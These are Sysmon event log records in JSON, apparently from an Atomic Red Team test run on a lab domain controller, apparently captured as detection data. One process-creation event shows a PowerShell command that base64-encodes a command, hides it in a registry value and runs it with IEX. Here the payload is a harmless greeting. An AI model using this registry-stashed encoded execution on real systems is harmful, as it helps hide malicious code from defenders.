{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5254,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.672\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-0010BD160A00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.672","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-0010BD160A00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5255,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.687\r\nProcessGuid: {A837DB8D-032C-5F25-0000-0010BD160A00}\r\nProcessId: 4420\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_iasihn0b.j05.ps1\r\nCreationUtcTime: 2020-08-01 05:52:44.687","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.687","ProcessGuid":"{A837DB8D-032C-5F25-0000-0010BD160A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_iasihn0b.j05.ps1","CreationUtcTime":"2020-08-01 05:52:44.687","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5256,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.719\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-0010BD160A00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.719","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-0010BD160A00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5257,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.719\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-0010BD160A00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.719","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-0010BD160A00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5258,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.944\r\nProcessGuid: {A837DB8D-032C-5F25-0000-00104D270A00}\r\nProcessId: 4368\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" & {$OriginalCommand = 'Write-Host \\\"\"Hey, Atomic!\\\"\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion -Name Debug -Value $EncodedCommand\npowershell.exe -Command \\\"\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion Debug).Debug)))\\\"\"} \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nParentProcessId: 3064\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.944","ProcessGuid":"{A837DB8D-032C-5F25-0000-00104D270A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" &amp; {$OriginalCommand = 'Write-Host \\\"\"Hey, Atomic!\\\"\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion -Name Debug -Value $EncodedCommand\npowershell.exe -Command \\\"\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion Debug).Debug)))\\\"\"} ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-032B-5F25-0000-0010D8E70900}","ParentProcessId":"3064","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5259,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.937\r\nSourceProcessGUID: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nSourceProcessId: 3064\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-00104D270A00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743cba8|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743ca1c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+474bf248|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47435604|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee5a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4745c2cb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f7c1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47431746|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4746a8d6","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.937","SourceProcessGUID":"{A837DB8D-032B-5F25-0000-0010D8E70900}","SourceProcessId":"3064","SourceThreadId":"5088","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-00104D270A00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743cba8|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743ca1c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+474bf248|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47435604|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee5a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4745c2cb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f7c1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47431746|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4746a8d6","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
